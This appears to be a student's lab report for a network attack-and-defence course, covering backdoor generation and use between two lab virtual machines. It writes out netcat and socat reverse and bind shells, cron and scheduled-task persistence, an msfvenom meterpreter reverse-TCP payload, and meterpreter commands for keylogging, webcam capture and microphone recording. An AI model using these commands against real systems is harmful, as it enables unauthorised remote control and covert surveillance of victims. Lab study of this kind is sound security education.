2018-2019-2 20165331《网络对抗技术》Exp2 后门原理与实践
实验收获与感想
通过本次实验,我对后门的生成及工作原理有了更深的理解,也学会了怎样用后门攻击同一网段下的不同主机。但是在实验的过程中,我产生了很多现在回想起来非常搞笑的错误,比如主客体主机互相ping时输错IP地址、因为没有处理好虚拟机网络连接方式而在某一步卡了2小时之久等等。可能也是有点着急了。在之后的学习中,我会放平心态,认认真真地去面对每一次实验,把每一次实验做好。
例举你能想到的一个后门进入到你系统中的可能方式?
在打开挂马网站的时候,网站后台打开下载程序从而使后门成功进入系统。而攻击方可以通过对后台下载程序(或网页)进行一定操作(例如修改大小)使被攻击方难以察觉其系统已被植入后门。
例举你知道的后门如何启动起来(win及linux)的方式?
通过诱导被攻击方打开指定程序,同时后台启动后门。在windows中可以通过新建计划任务的方式让系统自启动后门程序。而在Linux中也可以用类似的方式(crontab)实现后门程序自启动。
Meterpreter有哪些给你映像深刻的功能?
首先要提到的就是界面吧。刚刚加载完毕时,该程序会加载一副插图,让我记忆深刻。然后就是其功能了,可以截图、截取音频等等。或许以后在没有用到摄像头的时候看到笔记本摄像头闪一下会突然变得焦虑起来吧(笑)。
如何发现自己有系统有没有被安装后门?
这个的话。。。我觉得现在的大多数杀毒软件都可以对此进行查杀。如果实验中我没关闭电脑管家的话甚至连植入后门都做不到。。。刚植入自动检测到,然后就被删了。
实验流程
〇实验全程记得关闭Windows防火墙及所有杀毒软件
注:在前两个任务和后两个任务中,我链接了不同的IP地址,事实证明后两个任务所连接的IP地址才是正确的。但前两步依旧得到了结果,故只在博客中统一修改IP地址。
实验中Windows主机IP为192.168.1.110,Linux主机IP为192.168.1.119
Ⅰ使用netcat获取主机操作Shell,cron启动
①首先把实验所需程序ncat和socat分别下载并解压到Windows和Linux中,并在命令行中获取两主机的IP地址
②从Windows开始,打开命令行程序,进入ncat.exe所在文件夹后,输入命令ncat.exe -l -p 5331(5331为端口号,端口号不同时无法进行此实验)
③在Linux端输入nc 192.168.1.110 5331 -e /bin/sh,再回到Windows端,此时可以接收Linux命令行命令,我使用了ls指令测试效果
④通过类似的方式,调换两主机的顺序,也可以进行该步实验。至此测试完毕
⑤在Windows命令行下使用命令ncat.exe -l 5331监听5331端口
⑥在Linux命令行下使用crontab -e指令打开计划任务栏(若出现选项,选3)
⑦在最后一行添加代码xx * * * * /bin/netcat 192.168.1.110 5331 -e /bin/sh,意为在每小时的xx分钟执行该行命令,我设定的时间为36
⑧之后等待到设定的时间即可看到结果
Ⅱ使用socat获取主机操作Shell, 任务计划启动
①在Windows中打开“计算机管理”,在其中找到“计划任务”项,选择“新建计划任务”
②在设定“操作”项时,选定程序为文件夹socat下的socat.exe文件,把参数修改为tcp-listen:5331 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5317,同时把cmd.exe的stderr重定向到stdout上
③运行该任务,并在Linux端输入命令socat - tcp:192.168.1.110:5331,成功
Ⅲ使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
①首先通过指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=5331 -f exe > 20165331_backdoor.exe生成后门
②在Windows命令行中通过指令ncat.exe -lv 5331 > 20165331_backdoor.exe把后门程序注入Windows系统中
③可在Windows对应的文件夹下找到该程序(因为截图时间较早,后门程序还显示为0KB,过一段时间后变更为73KB,对应于Linux生成的73802Byte字节程序)
④在Linux命令行中打开msfconsole,等待其加载完毕后会出现msf5 >并可在之后输入指令
⑤连续使用命令use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,set LHOST 192.168.1.119,set LPORT 5331设置监听的IP、端口等等,可通过命令show options查看设置情况
⑥使用exploit打开监听,并在Windows中运行后门程序,即可在Linux命令行中看到结果
Ⅳ使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
①在任务三的界面(即命令行为meterpreter >的状态)下,可以通过各种不同指令调取被攻击机的功能
②首先来截个图,命令为webcam_snap,同时可以通过指令keyscan_start开启击键记录,并可以通过keyscan_dump查看直至当前时刻为止的击键记录
③截图效果如下
④还可以通过命令record_mic来录音,可以加入-d参数控制录音时间
